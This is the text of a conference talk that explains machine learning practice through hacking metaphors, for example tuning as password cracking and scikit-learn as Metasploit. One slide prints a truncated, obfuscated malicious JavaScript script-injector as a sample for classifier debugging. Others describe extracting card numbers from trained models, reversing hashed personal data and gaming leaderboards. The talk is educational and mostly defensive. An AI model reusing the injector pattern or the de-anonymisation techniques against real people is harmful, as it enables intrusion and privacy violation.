“Do machine learning like the great [hacker] you are, not like
the great machine learning expert you aren’t.” - Zinkevich
Rules of Machine Learning: Best Practices for ML Engineering (2015, Zinkevich)
Who am I?
• Thankful for the opportunity to speak here!
• Data scientist & InfoSec analyst at Nubank
• Competitive data science fanatic
• Horrible Portuguese speaker (more so with public
speaking). Questions and clarifications in English please.
• @mlwave
Disclaimer
• These slides are for entertainment, educational and
research purposes only.
• ML is powerful and easy: “Since every scientific discovery
gives more power over nature, it can increase good or
evil.” - César Lattes
• Hacking is fun: But not a substitute for rigorous study and
theory. Think of the impact your ML solution has on users.
acm.org/code-of-ethics
Scope
• This presentation will be all over the place. I don’t know
whether you have never trained a model before or are
experienced with ML.
• But I hope this presentation will be interesting for the
hackers, makers, creators of all types.
• Catch me afterwards, if you want to talk about hyper
optimization.
What is AI?
Deep Visual-Semantic Alignments for Generating Image Descriptions (2015, Karpathy et al.)
Boy holds baseball bat Cat sits on couch
What is AI?
• AI grew out of Operations Research after WWII
• AI consists of many diverse subfields ranging from:
Psychology, Neuroscience, Mathematics, Linguistics,
Learning Theory, (Quantum) Physics, Computer Science,
Information Theory, Statistics, Robotics, Philosophy,
Machine Learning.
• Fight hype. Replace the word `AI` with `Software`: if the result
sounds silly or obvious, then the application of AI usually is
too. Power question: “What is your false positive rate?”
What is Machine Learning?
• Automatically learn from data
• Increased business usage: AI, Machine Learning, Software
will continue eating the world.
• Unsupervised learning (Amazon Recommendations).
Supervised learning (Spam classification). Reinforcement
learning & Self-supervision/Self-play (AlphaGo).
• Consists of: Engineering, research, data management,
domain expertise, analysis, decision science, safety, legal,
ethics, UX, monitoring, predictive modeling.
Why Software Is Eating the World (2011, Andreessen)
What is Predictive Modeling?
• Puts the focus on creating predictions:
• Use of model,
• how to use the data,
• how to get good accuracy.
• Essential for creating a first solution, but only the bare minimum
of what goes into Machine Learning at commercial scale. ML
competitions are largely about predictive modeling.
Useful Paradigms
• Functionalism: Input -> Function -> Output
• Connectionism: Learn from data bottom-up by stacking
learning primitives, not top-down.
• Black Box Learning: Let the machine do the work. Don’t
care if I understand what it does.
• Coding Theory: Error detection and compression
Functionalism
• Philosophy of Mind: Mental states are defined by how they
function, not defined by what they are made of.
• Function does not depend on the material: You can build a
functional mouse trap from wood or metal.
• Perhaps we can model functional intelligence with
computers too?
Connectionism
• Philosophy of Mind: Cognition can arise by connecting
functional nodes to form a network structure.
• Artificial Neural Nets & Deep Learning are examples of this
approach: Stacking layers of nodes for ever higher-level
learning
• Perhaps we can model intelligence with network
architectures too?
Connectionism - Stanford Encyclopedia of Philosophy (1997, Garson)
Black Box ML
• View machine learning models as a black box: You only
care about what goes in, and what goes out (its function).
"A labrador retriever
puppy with tongue
hanging out"
• Don’t care if there is a magical daemon or a complex
math formula in the box.
• The question then becomes: How to transform the data, and
how to parametrize the black box, so as to get the best
predictions?
• Remember: Garbage in - Garbage out (Don’t trust for
critical stuff like healthcare or self-driving cars or AGI)
The Chinese Room Argument - Stanford Encyclopedia of Philosophy (Cole, 2004)
Coding Theory
• Coding theory is concerned with effective communication
and data integrity
• Cryptography, Error Correction, Data Compression: All
about finding (or hiding) the signal in the noise.
• Machine Learning is essentially learning to correct errors.
• Data compression, just like ML, is about finding the most
relevant patterns.
Data
• Data can be structured or unstructured.
• Tabular data is structured and can more readily be used
• Text and Sound and Images are unstructured
• Data can be temporal, for instance: time-series
• Rarely, data is in the shape of a graph (for instance, relations
between gang members)
Feature Engineering
• Most data needs to be converted to numbers first
[Diagram: Input -> Transform -> Model -> Output, that is: Data -> Feature Engineering -> Predictive Modeling -> Predictions]
• Feature engineering:
• is transforming data into something a model can
understand.
• Creative part of ML with enough tricks to write a book
• Has a few basic tricks that are enough to get most
models to work well.
Feature Extraction - Foundations and Applications (Guyon et al., 2006)
Feature Engineering: Tricks
• Categorical Variables
• Label encoding for decision trees:
Red    1
Green  2
Blue   3
• One-hot encoding for neural nets:
       Red  Green  Blue
Red    1    0      0
Green  0    1      0
Blue   0    0      1
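The two encodings can be sketched in a few lines of Python. This is a minimal illustration with pandas, assuming a made-up `color` column; the integer mapping simply copies the numbers from the slide.

```python
import pandas as pd

# Hypothetical categorical column (values are illustrative).
colors = pd.Series(["Red", "Green", "Blue", "Green"], name="color")

# Label encoding: map each category to one integer.
label_map = {"Red": 1, "Green": 2, "Blue": 3}
label_encoded = colors.map(label_map)

# One-hot encoding: one 0/1 column per category, in a fixed column order.
one_hot = pd.get_dummies(colors, dtype=int)[["Red", "Green", "Blue"]]

print(label_encoded.tolist())   # [1, 2, 3, 2]
print(one_hot.values.tolist())  # [[1, 0, 0], [0, 1, 0], [0, 0, 1], [0, 1, 0]]
```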
Feature Engineering: Tricks
• That’s really (mostly) it!
• You can now apply the most advanced machine learning
algorithms to data and something you want to predict.
• More advanced feature engineering uses domain
expertise, intuition, unsupervised learning/embeddings,
and automation (see FeatureTools).
Feature Engineering - Sao Paulo ML Meetup (2017, van Veen)
Modeling
• A model tries to give accurate predictions for new unseen
data.
• It uses training data together with labels/ground truth/what
you want to predict.
[Diagram: Input -> Transform -> Model -> Output, that is: Data -> Feature Engineering -> Predictive Modeling -> Predictions]
Modeling
Gender    Likes Open Source?    Wants RoadSec ticket?
0         1                     ?
• Gender did not show any correlation, and 3/4 of the people
who like Open Source also wanted a RoadSec ticket.
• A good model may predict a probability of 0.75, or a hard
prediction of 1.
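To make the 0.75 concrete, here is a toy sketch in plain Python. The eight rows are invented so that they match the description (gender is uninformative, 3 out of 4 Open Source fans want a ticket); the "model" is just a conditional frequency, not a real learning algorithm.

```python
# Toy rows: (gender, likes_open_source, wants_ticket). Made-up data for illustration.
rows = [
    (0, 1, 1), (1, 1, 1), (0, 1, 1), (1, 1, 0),
    (0, 0, 0), (1, 0, 1), (0, 0, 0), (1, 0, 0),
]

def ticket_rate(rows, likes_open_source):
    """Share of people with the given Open Source answer who wanted a ticket."""
    wanted = [ticket for _, likes, ticket in rows if likes == likes_open_source]
    return sum(wanted) / len(wanted)

# Prediction for the new person: likes Open Source, label unknown.
probability = ticket_rate(rows, likes_open_source=1)
hard_prediction = int(probability >= 0.5)
print(probability, hard_prediction)  # 0.75 1
```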
Modeling
• What model do you use for data?
• Tabular data: Gradient boosted decision trees (XGBoost)
• Images: Pre-trained deep neural net (or Detectron)
• Text: TFIDF -> Logistic Regression (or FastText, ULMFiT,
BERT)
Search for above terms in combination with “machine learning”
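As a rough sketch of the text recipe, the scikit-learn pipeline below chains TFIDF into Logistic Regression. The six example messages and their spam labels are invented for illustration; a real problem needs far more data.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

# Tiny made-up corpus: 1 = spam, 0 = not spam.
texts = [
    "win free money now", "free prize click now", "cheap money offer",
    "meeting at noon tomorrow", "lunch with the team", "project notes attached",
]
labels = [1, 1, 1, 0, 0, 0]

# TFIDF turns text into numbers, Logistic Regression learns from them.
model = make_pipeline(TfidfVectorizer(), LogisticRegression())
model.fit(texts, labels)

# Probability that a new message is spam.
proba = model.predict_proba(["free money offer"])[0, 1]
print(round(proba, 2))
```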
Optimization
• A Python classifier may look like:
FactorizationMachineBinaryClassifier(iters=5,
learning_rate=0.1, latent_dim=20, radius=0.5,
lambda_linear=0.0001, lambda_latent=0.0001,
normalize='Auto', norm=True, caching='Auto',
shuffle=True, verbose=True)
The trick is to tweak these parameters to get a better evaluation score.
Stop when every further change makes the evaluation worse.
Brute Forcing
• View hyper parameter optimization as a password
cracking task
• Enumerate or randomly try all possible parameters within a
range.
• Dictionary attack: Use “password dictionary files” with good
parameters that worked on other problems. Try these first.
• This is basically Random Search or Adaptive Search
Random Search for Hyper-Parameter Optimization (Bergstra et al., 2012)
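A minimal sketch of random search with scikit-learn's `RandomizedSearchCV`. The model, the dataset (iris) and the parameter ranges are assumptions chosen to keep the example small, not recommended settings.

```python
from scipy.stats import randint, uniform
from sklearn.datasets import load_iris
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import RandomizedSearchCV

X, y = load_iris(return_X_y=True)

# Ranges to sample from; these bounds are illustrative assumptions.
param_distributions = {
    "n_estimators": randint(10, 60),
    "max_depth": randint(1, 5),
    "learning_rate": uniform(0.01, 0.3),  # samples from [0.01, 0.31]
}

# Try 8 random parameter combinations, each scored with 3-fold cross-validation.
search = RandomizedSearchCV(
    GradientBoostingClassifier(random_state=0),
    param_distributions,
    n_iter=8,
    cv=3,
    random_state=0,
)
search.fit(X, y)
print(search.best_params_, round(search.best_score_, 3))
```

The "dictionary attack" variant would replace the random distributions with a short list of parameter sets that worked on earlier problems and try those first.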
Brute Forcing
• How to find the best weights for an average ensemble?
• Is it differentiable?
• Which optimizer do we pick?
• Do we set any regularization?
• Allow negative weights?
• How about trying every possible combination of weights
and picking the one with the best evaluation? Worst case:
you spend 2 hours more compute.
KazAnova@kaggle
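The brute-force idea can be sketched with NumPy: enumerate every weight combination on a coarse grid and keep the best one. The three "models" here are synthetic (the truth plus noise), and mean squared error stands in for whatever evaluation metric the competition uses.

```python
import itertools
import numpy as np

rng = np.random.default_rng(0)
y_true = rng.integers(0, 2, size=500)
# Three hypothetical models: the truth plus different amounts of noise, clipped to [0, 1].
preds = [np.clip(y_true + rng.normal(0, s, size=500), 0, 1) for s in (0.4, 0.6, 0.8)]

def mse(p):
    """Mean squared error against the known labels (lower is better)."""
    return float(np.mean((p - y_true) ** 2))

steps = np.linspace(0, 1, 11)  # candidate weights 0.0, 0.1, ..., 1.0
best_score, best_weights = float("inf"), None
for w in itertools.product(steps, repeat=len(preds)):
    if not np.isclose(sum(w), 1.0):
        continue  # keep only weight combinations that sum to 1
    blend = sum(wi * pi for wi, pi in zip(w, preds))
    score = mse(blend)
    if score < best_score:
        best_score, best_weights = score, w

print(best_weights, round(best_score, 4))
```

In practice the weights should be chosen on held-out predictions, otherwise the search itself overfits.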
Brute Forcing
• Do we really need to manually train all these models?
• What would happen if we automatically trained 1,000
random models with random data transformations and
threw them all into another black box?
• Out comes a winning Kaggle submission…
Kaggle Ensembling Guide (van Veen et al., 2015)
Fuzzing with Permutations
• View feature interaction expansion/feature selection as a
fuzzing task.
• Train a model and evaluate on test set.
• For every column in test set:
• randomly shuffle the column
• Evaluate the new predictions
• If the evaluation is no worse (or even better) with the
column randomly shuffled, then you can safely discard the column.
Permutation importance: a corrected feature importance measure (Altmann et al., 2010) via far0n@kaggle
See Fast.AI tutorial for more on this technique.
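The shuffle loop above can be sketched as follows. This is a hand-rolled illustration on the iris data with one pure-noise column appended (an assumption, so there is something to discard); scikit-learn also ships a ready-made `sklearn.inspection.permutation_importance`.

```python
import numpy as np
from sklearn.datasets import load_iris
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(0)
X, y = load_iris(return_X_y=True)
# Append a pure-noise column so there is a candidate for removal.
X = np.column_stack([X, rng.normal(size=len(X))])
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.3, random_state=0, stratify=y
)

model = GradientBoostingClassifier(random_state=0).fit(X_train, y_train)
baseline = model.score(X_test, y_test)

drops = []
for col in range(X_test.shape[1]):
    shuffled = X_test.copy()
    shuffled[:, col] = rng.permutation(shuffled[:, col])  # break this column only
    drops.append(baseline - model.score(shuffled, y_test))

# A drop near zero (or negative) marks a column the model does not need.
for col, drop in enumerate(drops):
    print(f"column {col}: accuracy drop {drop:+.3f}")
```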
Script kiddies
• Use tools developed by others
to attack a machine learning
problem.
• ML Community is incentivized
to share easily replicable code.
• Wield same power as the
biggest AI companies in the
world.
• No shame in this! Start
somewhere, why not near the
top?
Warez
• Good tools:
• allow you to experiment and iterate quickly
• have an active community contributing new features
• can be applied to many different problems with similar
results.
• abstract away complexity.
Python
• Grown to be essential to data science and machine
learning.
• Learn Python The Hard Way and you have access to an
amazing machine learning stack.
• Then learn “one-- and preferably only one --obvious way to
do it.”
• Python code can read like pseudo-code
PEP 20 — The Zen of Python (Peters, 2004)
Beat the benchmark with less then 200MB of memory (tinrtgu, 2014)
Python
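from sklearn import datasets, ensemble
# Load the iris flowers dataset: features X, species labels y
iris = datasets.load_iris()
X = iris.data
y = iris.target
# Train gradient boosted decision trees with default settings
model = ensemble.GradientBoostingClassifier()
model.fit(X, y)
# Predict on the training rows; use held-out data for a real evaluation
p = model.predict(X)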
Scikit-Learn
• The Metasploit of Machine Learning
• Uses one API for all models (models are all trained the
same way, so learn it only once, and have access to all
models)
• You could get by for a while by learning only this library very well
Scikit-learn: Machine Learning in Python (Pedregosa et al., 2011)
XGBoost
• The best for tabular data:
• Extremely fast
• Very good performance
• Can model complex problems
• Supports Scikit-Learn API
• Alternatives: GradientBoostingClassifier, CatBoost,
LightGBM.
XGBoost: A Scalable Tree Boosting System (2016, Chen et al.)
Keras
• User-friendly wrapper around deep learning libraries such as
TensorFlow.
• Learn Keras and you can work with the latest architectures
in deep learning.
• Alternatives: PyTorch with Fast.AI library
Deep Learning with Python (Chollet, 2017)
Vowpal Wabbit
• Very fast online learning on data bigger than memory
• Can be faster and more accurate than Hadoop/Spark
• Uses cool hashing trick inspired by Bloom filter
• Support for contextual bandits (automated decision
making)
• Eats raw features:
• 1 '10000074 |f category_x_transport emails_cnt:0.0
emails_cnt_x_0 avtomobil_ v ideal_nom sostoanii
exclamationmark 2005
A Reliable Effective Terascale Linear Learning System (Agarwal et al., 2011)
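The hashing trick can be sketched in plain Python: feature names are hashed straight into a fixed number of buckets, so no vocabulary has to be built or kept in memory. This is an illustration only; `zlib.crc32` and the bucket count are stand-ins, not the hash function or defaults Vowpal Wabbit actually uses.

```python
import zlib

def hash_features(tokens, n_buckets=2 ** 18):
    """Map raw 'name' or 'name:value' tokens to {bucket_index: value}."""
    vector = {}
    for token in tokens:
        name, _, value = token.partition(":")
        index = zlib.crc32(name.encode("utf-8")) % n_buckets
        # Tokens without an explicit value count as 1.0; collisions simply add up.
        vector[index] = vector.get(index, 0.0) + (float(value) if value else 1.0)
    return vector

raw = "category_x_transport emails_cnt:0.0 exclamationmark 2005".split()
hashed = hash_features(raw)
print(hashed)
```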
Pandas & NumPy & SciPy
• Read and manipulate tabular data with Pandas
• Fast, scalable and supports many types of data
• Perform vector operations on NumPy (or Numba) arrays
• Wide support for scientific calculations
Python for Data Analysis: Data Wrangling with Pandas, NumPy, and IPython (McKinney, 2011)
Reverse Engineering
• Use frequency tables to reverse engineer the data to its
original form.
• label:TF -> English_word_frequency(IDF(label)) ->
Porter_Stemmer(word):TF*IDF
• feature5:bfqm9c -> US_state_population(ratio(bfqm9c)) ->
State:New_York
Tricks as seen on the Kaggle forums
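A toy sketch of the frequency-table idea: rank the obfuscated tokens by how often they occur and line them up with a public table ranked the same way. The tokens, counts and reference shares below are all invented for illustration; real data is noisier, and close frequencies make the match ambiguous.

```python
from collections import Counter

# Obfuscated column as it might appear in a dataset (made-up tokens and counts).
obfuscated = ["bfqm9c"] * 6 + ["k2x0aa"] * 12 + ["zz81qp"] * 9

# Public reference table: relative sizes of the candidate categories (illustrative numbers).
reference_share = {"California": 0.45, "Texas": 0.33, "New York": 0.22}

# Rank both sides from most to least frequent and pair them up.
counts = Counter(obfuscated)
tokens_by_freq = [token for token, _ in counts.most_common()]
names_by_share = sorted(reference_share, key=reference_share.get, reverse=True)
mapping = dict(zip(tokens_by_freq, names_by_share))

print(mapping["bfqm9c"])  # New York
```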
Reverse Engineering
• Use model predictions to reverse engineer the training
data.
• Simple brute-force can use fitted language models to
retrieve:
• Credit Card Numbers
• Social Security Numbers / CPF’s
• even if the model has seen them only once (deep learning
is good at memorization)
The Secret Sharer: Measuring Unintended Neural Network Memorization & Extracting Secrets (Carlini et al., 2018)
Social Engineering
• You cannot survive in most businesses
with just predictive modeling.
• Companies don’t hire an AutoML
solution, they hire people.
• The majority of the day-to-day
complexity in the chain between data
infrastructure and decision makers
is social, not technical.
Social Engineering
• How to gain access to online data science community?
• Compete together.
• Write a cool blog about it.
• Write/contribute Open Source projects.
• Write tutorials/step-by-step guides.
• Basically share everything: A 100-line Python script (toy
wrapper for Regularized Greedy Forest) could grow to a
professional project that you now can use yourself.
https://github.com/RGF-team/rgf
Operational Security
• Business:
• Keep pipelines simple
• Document & Revisit
• Automate, Test & Monitor
• Competitions:
• Loose lips sink ships: Be careful what competitive
advantage you share
• Show, don’t tell: Save your most powerful models until the
very last moment
Hacking Leaderboards
• Always wanted to rank #1 on a leaderboard?
• Wacky Boosting:
• Keep changing your submission
• use leaderboard feedback to see if it was a good change
or a bad change.
• Keep good changes.
• Repeat until you are #1
• Will horribly overfit, but can also cause others to overfit!
Competing in a data science contest without reading the data (2015, Hardt)
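A small simulation of the idea, loosely following the attack described in the cited post: submit random guesses, keep the ones the public leaderboard scores above chance, and combine them by majority vote. All labels are synthetic and the sizes (2,000 public rows, 400 submissions) are assumptions.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 4000
hidden_labels = rng.integers(0, 2, size=n)  # known only to the organizers
public = np.arange(n) < n // 2              # first half scores the public leaderboard

def public_score(submission):
    """Accuracy on the public half: the only feedback an attacker sees."""
    return np.mean(submission[public] == hidden_labels[public])

# Submit random guesses and keep those that score better than chance.
kept = []
for _ in range(400):
    guess = rng.integers(0, 2, size=n)
    if public_score(guess) > 0.5:
        kept.append(guess)

# Majority vote over the kept submissions.
final = (np.mean(kept, axis=0) > 0.5).astype(int)
public_acc = public_score(final)
private_acc = np.mean(final[~public] == hidden_labels[~public])
print(f"public {public_acc:.3f}  private {private_acc:.3f}")
```

The public score climbs well above 0.5 without ever looking at the data, while the private score stays near chance: pure leaderboard overfitting.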
Information Snooping
• Normally it is not advisable to use the test set. But in
competitions the test set is available, so:
• Can use semi-supervised learning to extract information
from the test set. Use test set for:
• Frequency (TFIDF) or pre-training language models
• Fitting dimensionality reduction
• Adding confident predictions as labels to train set
github.com/gatapia Guido Tapia
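The last bullet (often called pseudo-labeling) can be sketched like this. The data is synthetic, and the 0.95 / 0.05 confidence thresholds are assumptions to be tuned with local evaluation.

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression

X, y = make_classification(n_samples=600, n_features=10, random_state=0)
X_train, y_train = X[:100], y[:100]  # small labeled training set
X_test = X[100:]                     # unlabeled competition test set

# Step 1: train on the labeled data and predict the test set.
model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
proba = model.predict_proba(X_test)[:, 1]

# Step 2: keep only test rows where the model is very sure (thresholds are assumptions).
confident = (proba > 0.95) | (proba < 0.05)
X_aug = np.vstack([X_train, X_test[confident]])
y_aug = np.concatenate([y_train, (proba[confident] > 0.5).astype(int)])

# Step 3: retrain on the original labels plus the pseudo-labels.
model = LogisticRegression(max_iter=1000).fit(X_aug, y_aug)
print(f"added {confident.sum()} pseudo-labeled rows")
```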
Rainbow tables
• Sometimes categorical variables are hashed to obscure
them.
• Can use rainbow tables to reverse (truncated) MD5 hash
and get the original feature.
• One time, this was obfuscated ordinals for a job puzzle
• One time, this was private data: IP addresses. Oops!
• One time, they forgot to obfuscate a misspelled patient
name in a psychiatric report. Oops!
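When the space of original values is small, reversing the hash needs nothing more than a precomputed lookup table, the simplest relative of a rainbow table (a real rainbow table stores hash chains to save space). The sketch below assumes the obfuscation was an 8-character truncated MD5 of an IP address in a known /24 range; both are assumptions for illustration.

```python
import hashlib

def md5_prefix(value, length=8):
    """Truncated hex MD5, as an obfuscation scheme might produce."""
    return hashlib.md5(value.encode("utf-8")).hexdigest()[:length]

# Precompute hash -> original for every candidate value (one /24 subnet here).
lookup = {md5_prefix(f"192.168.0.{i}"): f"192.168.0.{i}" for i in range(256)}

# What the published dataset would contain for one user.
obfuscated = md5_prefix("192.168.0.42")

# Reversing the "anonymization" is a dictionary lookup.
recovered = lookup.get(obfuscated)
print(recovered)
```

The full IPv4 space has only about 4.3 billion values, so the same approach scales to every possible address with modest hardware.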
Breaking Stuff
• Keep asking your curious self:
What would happen if I changed
this to that? Be Bold!
• Local evaluation is your lifeline.
• Try everything, keep the good.
• Once I got an accuracy of 181% by
submitting correct answers twice.
[Figure labels: Statisticians; Machine Learners; Smart Machine Learner; CV]
(The joke is that there are only smart statisticians)
Intelligible Models for HealthCare: Predicting Pneumonia Risk and Hospital 30-day Readmission (Caruana, 2015)
DataLeaks
• A very common mistake. Can be deadly for business and
science, so become good at finding leaks.
• The task was to predict cancer. One of the variables was
“underwent surgery for cancer, yes/no?”
• You cannot use data that is not reasonably available at
test time (otherwise your lifeline, local evaluation, cannot be trusted).
Leakage in data mining: Formulation, detection, and avoidance (Kaufman et al., 2012)
DataLeaks
• Beware: The more powerful your model, the bigger the chance
that it exploits any leakage you did not find.
• The most powerful model is 1,000 data scientists at
typewriters, which is why competitions uncover more
leakage.
• A large share of leakage may simply go undetected.
Ben Hamner & Will Cukierski @ Kaggle
DataLeaks
• Winners of Microsoft malware binary classification 2015
were able to extract the desktop icon from the code.
Visualize malware patterns - Microsoft Malware Classification Challenge BIG2015, (Chen, 2015)
Sub-Linear Debugging
• Output information while your computations are running,
essential for iteration speed:
• You can quickly spot whether a change was good or bad.
• Feels like Neo in the Matrix if you do this with the data
itself during data reading.
• Can spot data health issues (text encoding errors, all
missing in the same row of data, etc.)
Online Learning and Sub-Linear Debugging (Mineiro, 2014)
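A minimal sketch of the idea in plain Python: an online logistic regression that scores each row before learning from it (progressive validation) and prints the running loss at rows 1, 2, 4, 8, and so on, so feedback arrives long before the full pass finishes. The data stream, learning rate and model are toy assumptions.

```python
import math
import random

random.seed(0)

def stream(n):
    """Hypothetical data stream: the label is 1 when x > 0.5."""
    for _ in range(n):
        x = random.random()
        yield x, int(x > 0.5)

w, b, lr = 0.0, 0.0, 0.5
total_loss, checkpoints = 0.0, []
for t, (x, y) in enumerate(stream(5000), start=1):
    p = 1.0 / (1.0 + math.exp(-(w * x + b)))
    p = min(max(p, 1e-12), 1 - 1e-12)  # guard against log(0)
    # Progressive validation: score the prediction before learning from the row.
    total_loss += -(y * math.log(p) + (1 - y) * math.log(1 - p))
    # One step of stochastic gradient descent on the log loss.
    w -= lr * (p - y) * x
    b -= lr * (p - y)
    if (t & (t - 1)) == 0:  # t is a power of two
        checkpoints.append((t, total_loss / t))
        print(f"{t:>6} rows  average log loss {total_loss / t:.4f}")
```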
Error Debugging
• See where your model makes the biggest mistakes.
• Then try to fix it by creating new features
• Below sample confidently predicted as minified JS when it
was actually obfuscated malicious JS:
4x66x32x37x62x33x31x38x30x38x31x34x37x63x32x34x30x62x35x65x31
x63x34x35x34x39x63x36x37x64x65x32","x67x65x74x45x6Cx65x6Dx65x6E
x74x73x42x79x43x6Cx61x73x73x4Ex61x6Dx65","x72x65x6Dx6Fx76x65","
x67x65x74x45x6Cx65x6Dx65x6Ex74x42x79x49x64"];function
injectarScript(_0x78afx2){return new Promise((_0x78afx3,_0x78afx4)=>{const
_0x78afx5=document[_0xc7ae[1]](_0xc7ae[0]);_0x78afx5[_0xc7ae[2]]=
true;_0x78afx5[_0xc7ae[3]]= _0x78afx2;document[_0xc7ae[5]][
Warsaw.js
Error Debugging
• How to fix?
• Add count of numbers / count of characters
• Add human-readability score
• Add count of “x” / count of characters
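The three candidate features can be sketched in plain Python. The readability score below is a crude stand-in (share of characters that belong to alphabetic words of three or more letters), and both sample strings are shortened examples, not the full files.

```python
import re

def obfuscation_features(source):
    """Character-ratio features suggested by the misclassified sample."""
    n = max(len(source), 1)
    words = re.findall(r"[A-Za-z]{3,}", source)
    return {
        "digit_ratio": sum(c.isdigit() for c in source) / n,
        "x_ratio": source.count("x") / n,
        # Crude stand-in for a human-readability score.
        "word_char_ratio": sum(len(w) for w in words) / n,
    }

obfuscated = "x67x65x74x45x6Cx65x6Dx65x6Ex74"  # hex-escaped string fragment
minified = "function add(a,b){return a+b}"     # ordinary minified JS

print(obfuscation_features(obfuscated))
print(obfuscation_features(minified))
```

After adding such features, retrain and check with local evaluation whether the confident mistakes actually disappear.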
Dumpster Diving
• You should find out the sources and shapes of all your
data, then do a deep dive:
• Winners of the IJCNN 2011 Challenge wrote a Flickr
crawler to de-anonymize users and obtain the ground truth.
• Winners of the West Nile Virus Prediction Challenge found
research papers which contained part of the ground truth.
Link Prediction by De-anonymization: How We Won the Kaggle Social Network Challenge (2011, Narayanan et al.)
Adversarial Input
• These people are invisible to % of modern face detection
CV Dazzle (Harvey et al., 2010)
Adversarial Input
• This image is confusing to modern object detection
“A foreign attack
helicopter firing missiles”
Is attacking machine learning easier than defending it? (Goodfellow et al., 2017)
Adversarial Input
• Being able to fool neural networks, or build strong
defenses against adversarial images is hugely valuable.
• NIPS2018: Defense Against Adversarial Attack
• Goodfellow et al.: CleverHans
• Google: Unrestricted Adversarial Examples Challenge
Adversarial Thinking
• Pretend you are an Identity Fraudster:
• Do you hack at night or during your day job/school?
• Do you change details like email to match your victim’s
name?
• Are you more likely to use Windows or Linux?
• Do you move location often, or use Tor to hide your
location?
• Do you try to get as much money as fast as possible, or
are you more patient?
• Do you memorize your victim’s personal details?
Adversarial Thinking
• Try to attack a system, then invent safeguards:
• Encode time of day of the attempt
• Look at string distance between legal name and email
name
• Deduce operating system from user agent string
• Check if IP was used for malicious behavior before
• Check if IP is a Tor IP
• Check how long the user spends in the funnel / form behavior
• Check if the user demands an unusually high limit
• …
Statistical Fraud Detection: A Review (Bolton et al., 2002)
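A few of these safeguards can be turned into features with the standard library alone. This is a sketch under simple assumptions: the function name, the field names and the sample values are hypothetical, and the operating system check is deliberately crude (for example, Android user agents also contain "Linux").

```python
from datetime import datetime
from difflib import SequenceMatcher

def fraud_features(legal_name, email, user_agent, timestamp):
    """Turn one signup attempt into a few of the safeguard signals listed above."""
    email_name = email.split("@")[0].lower()
    name = legal_name.lower().replace(" ", "")
    ua = user_agent.lower()
    if "windows" in ua:
        os_name = "windows"
    elif "linux" in ua:
        os_name = "linux"
    else:
        os_name = "other"
    return {
        "hour_of_day": timestamp.hour,
        # 1.0 means the email name matches the legal name exactly.
        "name_email_similarity": SequenceMatcher(None, name, email_name).ratio(),
        "os": os_name,
    }

features = fraud_features(
    "Maria Silva",
    "maria.silva@example.com",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    datetime(2018, 11, 10, 3, 15),
)
print(features)
```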
Botnet
• Much of commercial ML can be, or is being, automated.
Much of advertisement fraud is automated already.
• It is possible to get a good score in a competition
completely automatically.
• You can aggregate the results of many (automated)
agents and get an even better result.
• Thinking back to the ID fraudster example. Can you
imagine how to cheat a ML competition? Could you
encode ways to safeguard against this?
Clickjacking campaign abuses Google Adsense, avoids ad fraud bots (Segura, 2017)
Case Study: Higgs Boson
• “Science cannot predict what will happen. It can only
predict the probability of something happening.” - César Lattes
• Use data from the ATLAS experiment to identify the Higgs
boson (probability of it being signal or background noise)
• No knowledge of particle physics is required.
• XGBoost was a 0-day during competition (This could’ve
been you!)
Higgs Boson Detection Challenge (2014, Kaggle & CERN)
Case Study: Higgs Boson
• Let’s hack together a solution:
• Create random feature interactions and use Permutation
Feature Importance to select the best ones
• Add the best interactions to the data
• Train 50 randomly initialized XGBoost models
• Pick the model with the best log loss, lower the learning rate, and
use early stopping to find the best number of trees.
• Repeat above 3 times and average results
Position: 30/1785
Further Learning
• MOOCs: Andrew Ng’s Machine Learning on Coursera,
Competitive Data Science Coursera, Abu-Mostafa Caltech
Learning from Data
• Platforms: Kaggle (Tutorials, Projects, Competitions,
Forums, Kernels)
• Programs: Fast.AI (Learn deep learning state-of-the-art)
• Meetups: Sao Paulo Machine Learning Meetup
• Books: Programming Collective Intelligence
• Blogs: MLWave, FastML, MLWhiz, Machine Learning is Fun!
• Professors: Find a cool professor and study their online output